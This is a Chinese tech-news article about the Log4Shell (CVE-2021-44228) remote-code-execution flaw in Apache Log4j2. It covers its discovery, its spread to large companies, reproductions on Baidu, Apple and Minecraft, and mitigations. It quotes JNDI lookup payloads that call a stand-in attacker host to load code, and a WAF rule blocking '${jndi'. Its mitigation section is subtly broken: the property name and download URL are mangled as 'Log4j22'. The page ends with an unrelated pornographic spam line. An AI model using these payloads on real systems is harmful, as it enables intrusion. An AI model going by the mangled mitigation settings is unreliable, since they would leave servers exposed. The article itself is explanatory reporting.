您的位置:首頁 > 互聯網

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            發布時間:2022-03-09 03:02:46  來源:IT資訊網    采編:author  背景:

                                            2021年11月24日,阿里云安全團隊依然像往常一樣進行著漏洞的篩查工作。

                                            讓人沒想到的是,團隊成員之一的Chen Zhaojun一鏟子下去,就挖出了一個「過去十年來影響最大、最嚴重的漏洞」——Log4Shell。

                                            借著這個漏洞,攻擊者只需要提交一個字符串就能訪問對方的服務器,甚至還能在里面上傳運行任何代碼!

                                            結果就是,12月10號,本來已經在準備過周末的大廠程序員們,都起來通宵加班處理漏洞了。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            這個漏洞波及了多少大廠呢?

                                            由于Log4j2這個庫實在是太受歡迎了,所以包括蘋果、Tesla、亞馬遜、Cloudflare、ElasticSearch、Red Hat、Twitter、Steam、百度、網易、騰訊等大廠都會受到影響。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            可能,還有數百家甚至數千家其他組織也會受到影響。

                                            一些信息安全研究人員預計,未來幾天互聯網上對服務器的攻擊會大幅增加。

                                            驚魂一刻

                                            11月24日,開源項目Apache Log4j2的一個遠程代碼執行漏洞被提交。

                                            12月7日上午,Apache發布了2.15.0-rc1版本更新。

                                            12月9日晚,漏洞的利用細節被公開,影響范圍幾乎橫跨整個版本(從2.0到2.14.1-rc1)。

                                            當大家紛紛升級到2.15.0-rc1之后發現,該補丁依然可以被繞過。

                                            12月10日凌晨2點半左右,Apache Log4j2緊急更新了2.15.0-rc2版本。

                                            此時,各個大廠也幾乎都在熬夜搶修。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            據火絨不完全統計,僅在Github上,就有60644個開源項目發布的321094軟件包存在風險,這一漏洞可以說是影響了互聯網上70%以上企業系統的正常運轉。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            Java開發框架中,受到Log4j2的影響Top10(來源:火絨安全)

                                            這一漏洞名為CVE-2021-44228,也叫Log4Shell或LogJam,是一個遠程代碼執行(RCE)類漏洞,存在于一個「數百萬」應用程序都在使用的開源Java日志庫Log4j2中。

                                            由于Java應用程序通常會記錄各種各樣的事件,例如用戶發送和接收的消息,或者系統錯誤的詳細信息,因此該漏洞可以通過多種方式觸發。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            而這一漏洞最危險的地方是它太容易被攻擊者利用了,即使是毫無經驗的普通人也可以利用這個漏洞成功執行攻擊。

                                            攻擊者只需發送一則特殊的消息到服務器(包含類似${jndi:ldap://server.com/a}的字符串),就可以執行任意的代碼,并有可能完全控制該系統。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            據阿里的@程序員子悠介紹,服務器會通過Log4j2記錄攻擊者發送的請求匯中包含的基于JNDI和LDAP的惡意負載${

                                            jndi:ldap://http://attacker.com/},其中,http://attacker.com是攻擊者控制的地址。

                                            當服務器通過JNDI向http://server.com請求,觸發惡意負載之后,http://attacker.com就可以在響應中添加任何可執行腳本,注入到服務器進程中。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            于是,上個周末,大大小小公司的安全團隊都在爭先恐后地修補Log4Shell漏洞,晚一秒,就有可能讓黑客危及互聯網上數百萬臺設備。

                                            而黑客們也沒閑著,安全服務商imperva當天就監控到了140多萬次針對CVE-2021-44228的攻擊。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            新西蘭計算機應急響應小組(CERT)、德國電信(Deutsche Telekom)和Greynoise的網絡監控服務都發出了警告:「攻擊者已經在積極利用這個漏洞」。

                                            根據Greynoise的說法,大約100個不同的主機正在大規模地尋找利用Log4j2漏洞的方法。

                                            很快,多家信息安全新聞機構都報道了這個在Apache Log4j2庫中發現的,CVSS嚴重程度為10級的關鍵漏洞CVE-2021-44228。

                                            阿里云安全團隊在12月10日發布公告。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            https://help.aliyun.com/noticelist/articleid/1060971232.html

                                            國家互聯網應急中心12月10日發布公告。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            https://www.cert.org.cn/publish/main/9/2021/20211210110550958546708/20211210110550958546708_.html

                                            美國國家計算機通用漏洞數據庫12月10日發布公告。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            https://nvd.nist.gov/vuln/detail/CVE-2021-44228

                                            Apache基金會也迅速回應,建議所有開發人員能升級就升級,將手頭上使用到的Log4j2庫更新到2.15.0版本,如果因為一些原因升不了級,就使用Apache Log4j2安全漏洞頁面中描述的方法進行撲救。

                                            12月12號,有網友反映銀行的程序都不能用了,推測可能正在加班加點排查,看來波及范圍確實挺大的。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            這下程序員們要哭了,紛紛吐槽:

                                            「連夜搶修」

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            「忙活大半天」

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            復現漏洞

                                            國民級搜索引擎百度首先遭到了廣大網友的暴力測試!

                                            漏洞剛曝光時,如果在百度搜索框中輸入命令,然后在dnslog中就可以發現訪問信息,隨后開發人員也是緊急修復了這個漏洞。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            接著,網友又攻破了一向以安全性著稱的蘋果。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            Minecraft也同樣慘遭毒手。

                                            由于Minecraft在軟件中也采用了Log4j2,而且使用范圍很廣,這就導致了除Mohist 1.18外,Minecraft全版本所有系列的服務端全部處于高風險狀態。

                                            這樣一來,在聊天欄輸入命令就可以在游戲中作弊。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            對于Minecraft服主來說,當前最該做的就是立即關閉服務器,并進行升級和緊急修復,普通玩家則需要等待,直到服務器確認修復完成。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            解決方案

                                            根據360的建議,用戶可以進行如下操作。

                                            常規方案

                                            使用了Apache Log4j2的用戶,請將程序更新至官方最新安全版本(2.15.0-rc2)。下載地址:

                                            https://github.com/apache/logging-Log4j22/releases/tag/Log4j2-2.15.0-rc2

                                            臨時應急方案

                                            修改Log4j2配置:

                                            Log4j22.formatMsgNoLookups=True

                                            設置JVM啟動參數:

                                            -DLog4j22.formatMsgNoLookups=true

                                            設置環境變量:

                                            FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS值為true

                                            可以提高安全性的周邊設置

                                            以下設置或操作可能會對防護此次安全事件起到作用,但無法確保安全。建議結合實際應用場景進行配置:

                                            使用盡可能更高版本的JDK

                                            使用rasp阻斷lookup的調用

                                            使用waf對流量中的${jndi進行攔截

                                            禁止所有不必要的外連數據

                                            開源項目的風險

                                            Log4j2的安全事故一出,不禁讓廣大用戶重新開始懷疑:開源軟件是否真的安全?

                                            一方面大家覺得開源軟件嘛,代碼都拿到手了,在遵照開源協議的情況下,基本就是白嫖。

                                            另一方面,覺得有這么多人都在盯著這份代碼,肯定不會出bug,不然一定會有人提issue修復的。在不花錢的情況下,又指望它有企業級的維護支持與安全性保障。

                                            中國程序員搶先預警「史詩」級漏洞,席卷蘋果特斯拉

                                            殊不知,大部分開源軟件都是作者利用業余時間開發的,為開源社區貢獻代碼的驅動力全部來自于star和「用愛發電」。

                                            也正是因為免費,一些開源軟件的受眾規模特別大,從小公司到千億市值的企業都在使用,如果一旦出了漏洞,那后果將不堪設想。

                                            所以,開源有風險,使用需謹慎!

                                              聲明:本文僅為傳遞更多網絡信息,不代表IT資訊網觀點和意見,僅供參考了解,更不能作為投資使用依據。


                                            返回網站首頁 本文來源:IT資訊網

                                            本文評論
                                            基于人工智能的物聯網如何繁榮發展
                                            如果沒有獲得指導和幫助,即使是經驗豐富的工程師和物聯
                                            日期:02-26
                                            物聯網發展趨勢系列之十一(2018)
                                            本文是物聯網發展趨勢系列中2018年第十一篇文章,因為是
                                            日期:02-04
                                            ?2022 年 1 月的頭號惡意軟件: Lokibot 重返榜單,Emotet 重回榜首
                                            Check Point Research 指出,信息竊取程序 Lokibot 重返
                                            日期:02-27
                                            如何在Linux上檢測硬盤上的壞道和壞塊
                                            讓我們從壞道和壞塊的定義開始說起,它們是一塊磁盤或閃
                                            日期:04-07
                                            華為云如何賦能 “專精特新”企業?益心達給出一個答案
                                            面對益心達存在的難題,華為云提供了一套SRM解決方案,這
                                            日期:03-23
                                            京多條地鐵線實現4G全覆蓋:同時預留5G信號空間
                                            近日,北京市交通委官網發布消息稱,為全面提升地鐵民用通
                                            日期:04-01
                                            工信部:App開屏彈窗關不掉問題已基本清零
                                            近日,工信部部部長肖亞慶接受媒體采訪,暢談了反壟斷和反
                                            日期:03-26
                                            亞馬遜、微軟等60家高知名度公司遭受惡意軟件攻擊
                                            這個木馬程序針對60家頂級公司進行攻擊,其目的在于獲取
                                            日期:04-06
                                            Apple Watch會大賣嗎?
                                            凌晨蘋果的發布會后,今天我接到了數個采訪,大家都有個相
                                            日期:03-19
                                            華為與合作伙伴形成BYOD產業聯盟
                                            2014年5月25日-26日,華為網絡大會(HNC 2014)在北京召開
                                            日期:02-28
                                            Windows 10之后再無實體零售版
                                            周末,Windows 10的實體包裝遭到曝光,其中包括家庭版(藍色
                                            日期:03-13
                                            中國正邁入全光網時代 光纖行業機遇挑戰并存
                                            所謂全光網絡,指的是網絡傳輸和交換過程全部通過光纖實
                                            日期:04-05
                                             

                                            精品无码久久午夜福利